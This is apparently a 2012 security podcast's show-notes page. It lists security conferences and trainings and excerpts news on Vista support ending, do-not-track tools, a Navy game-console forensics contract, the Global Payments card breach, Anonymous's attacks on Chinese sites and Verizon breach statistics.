<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.computerworld.com/s/article/9225979/Microsoft_retires_Vista_Office_2007_from_mainstream_support_this_week?taxonomyId=125"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9225979/Microsoft_retires_Vista_Office_2007_from_mainstream_support_this_week?taxonomyId=125</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft will shift Windows Vista and Office 2007 into what it calls extended support over the next two days.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vista, the problem-plagued operating system that never really took hold among users, will exit mainstream support on Tuesday, April 10. According to Microsoft, Office 2007 leaves mainstream support today.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a product&#39;s extended support phrase, Microsoft continues to provide security patches to all users, but offers other fixes &#8212; such as reliability and stability updates &#8212; only to organizations that have signed support contracts with the company.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just seven weeks ago, Microsoft quietly extended support for the consumer versions of Windows Vista &#8212; as well as Windows 7 &#8212; by five years to synchronize their support lifecycle with that of the comparable enterprise editions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Previously, Microsoft had committed to supporting consumer software with security updates for just five years, not the 10 granted to business software.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vista&#39;s last major update was Service Pack 2 (SP2), which debuted in May 2009. Microsoft shipped the third and final Office 2007 service pack, SP3, last October.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Windows Vista&#39;s share of in-use operating systems has fallen dramatically since Microsoft introduced Windows 7 in October 2009. By the calculations of Web metrics firm Net Applications, Vista now accounts for just 7.7% of all operating systems, and 8.3% of the machines running Windows.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vista peaked at 19.1% in October 2009 and has been falling ever since. At the rate of its decline over the last 12 months, Vista will slip under the 5% bar in January 2013.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3349816/do-not-track-tools-hands-on-showdown"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3349816/do-not-track-tools-hands-on-showdown</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online tracking is a hot topic these days, with the Obama administration and the Federal Trade Commission calling for tougher online privacy protections. The FTC recently issued a report urging voluntary practices for online businesses regarding data collection. Another popular proposal suggests building a universal do-not-track function into future Web browsers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proposed universal do-not-track tool won&#39;t be particularly robust, since it would simply make your browser send a &quot;please don&#39;t track me&quot; request to a website. Given the past misbehaviors of Internet behemoths such as Facebook and Google, it&#39;s hard to put much faith in a solution that depends on the best intentions of site owners.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nevertheless, that&rsquo;s the gist of the FTC&rsquo;s appeal to Internet businesses for voluntary cooperation. Specifically, the agency suggests that privacy controls should be incorporated into new products and services by design (including that do-not-track feature in every browser, perhaps); that consumers should have simple ways to control their personal information; and that corporate data-collection practices should be transparent.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On balance, however, most of us pay via our eyeballs and our personal data for the majority of the information we access online. Targeted ads&#8211;sometimes laughably off-base, sometimes appropriate based on demographics&#8211;pop up on many sites in lieu of a paywall. If you really hate the ads, or if you don&rsquo;t want to share anything about yourself and your browsing habits, you might shell out for ad-free access to a site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/navy-hires-contractor-data-mine-gaming-consoles-040912"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/navy-hires-contractor-data-mine-gaming-consoles-040912</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Navy recently hired an outside contractor, Obscure Technologies, to develop computer forensics tools capable of analyzing network traffic and stored data on gaming consoles.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The contract, valued at $177,237.50, calls on Obscure Technologies to create hardware and software tools that can be used to extract data from video game systems, compile a collection of data (disk images; flash memory dumps; configuration settings) extracted from new and used video game systems, and prepare a 10-20 page report including the following:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Detailed accounts of issues involved in extracting forensic data from a series of game consoles, technical information regarding how information can be extracted from video game systems, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This project involves furnishing video game systems, both new and used, and creating prototype rigs for capturing data from the video game systems,&rdquo; reads the Navy&rsquo;s official listing.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The project seeks to create these tools for use by the United States Department of Homeland Security Science and Technology.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Obscure Technologies was awarded this contract, the Navy claims, because they appear to be the only U.S. company in the business of purchasing used computer equipment for the purpose of accessing the data stored within. The Navy&rsquo;s justification and approval report also notes that Obscure Technologies lead scientist has experience reverse engineering the Microsoft XBOX.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You can find the Navy&rsquo;s justification and approval document</span><a href="https://www.fbo.gov/index?s=opportunity&amp;mode=form&amp;id=fa7296a2e0980fe24aa72c919a665b44"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.itnews.com.au/News/296466,visa-expels-global-payments-after-card-breach.aspx"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itnews.com.au/News/296466,visa-expels-global-payments-after-card-breach.aspx</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa has dumped Global Payments from the list of credit card processing service providers it uses after a breach that compromised about 1.5 million cards.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The credit card maker said the list was for service providers that were compliant with payment industry guidelines.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Global Payments chairman and CEO Paul Garcia told investors that the dumping did not come as a surprise.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Upon reflection, this was not unexpected, and we are focused on remediation efforts for full and timely PCI (Payment Card Industry standard) reinstatement,&quot; he said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Global Payments said it is still processing transactions, despite being off Visa&#39;s approved list.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa moved much faster removing Global Payments from the list than it did when another processor, Heartland Payment Systems, announced a breach of some 100 million card numbers in January 2009.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In that case, Visa expelled Heartland from the list about two months later, but Heartland re-validated compliance within roughly six weeks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the case of Heartland, Visa told merchants that, despite the processor being temporarily removed from the list, they faced no fines for continuing to do business with it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Global Payments was the victim of a data breach affecting cards from all of the major brands, including Visa and MasterCard.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two days after confirming the breach, the company said fewer than 1.5 million card numbers were compromised, down from some earlier estimates that had placed the number closer to 10 million.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.reuters.com/article/2012/04/09/net-us-china-hackers-idUSBRE83808H20120409"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.reuters.com/article/2012/04/09/net-us-china-hackers-idUSBRE83808H20120409</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The activist hacker group Anonymous plans to launch further attacks on Chinese government websites in a bid to uncover corruption and lobby for human rights, a member of the group said on Monday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous, a loosely knit group that has attacked financial and government websites around the world, hacked into Chinese government websites last week, defacing several, media reports said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group used the Twitter account &quot;Anonymous China&quot; to publicize the attacks, posting links to data files that contained passwords and other personal information from the hacked websites. (</span><a href="https://twitter.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">twitter.com/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#!/AnonymousChina)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;First we want to alert the Chinese government that we aren&#39;t afraid, and we are going to show the truth and fight for justice,&quot; Anonymous hacker &quot;f0ws3r&quot; told Reuters.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<h3 dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.itworld.com/security/266128/basic-defenses-absent-most-breached-sites"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworld.com/security/266128/basic-defenses-absent-most-breached-sites</span></a></h3>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite rising concerns that cyberattacks are growing more and more sophisticated, hackers used relatively simple methods for 97% of data breaches in 2011, according to a report compiled by Verizon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The findings suggest that organizations are overlooking basic precautions even as they buy new security systems. Verizon also found that in 80% of attacks, hackers hit so-called victims of opportunity &#8212; poorly defended sites that happen to catch their eye &#8212; rather than targeting specific companies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Based on investigations into over 850 data breaches, the report was compiled with help from the U.S. Secret Service and with input from law enforcement agencies in the U.K., the Netherlands, Ireland and Australia, according to Verizon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the first time, attacks by so-called &quot; hacktivist&quot; groups such as Anonymous breached more records &#8212; over 100 million &#8212; than did hackers looking specifically to steal financial or personal data.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Often, the breached companies lacked firewalls, had ports open to the Internet or used default or easy-to-guess passwords, said Marc Spitler, a Verizon security analyst.</span></p>
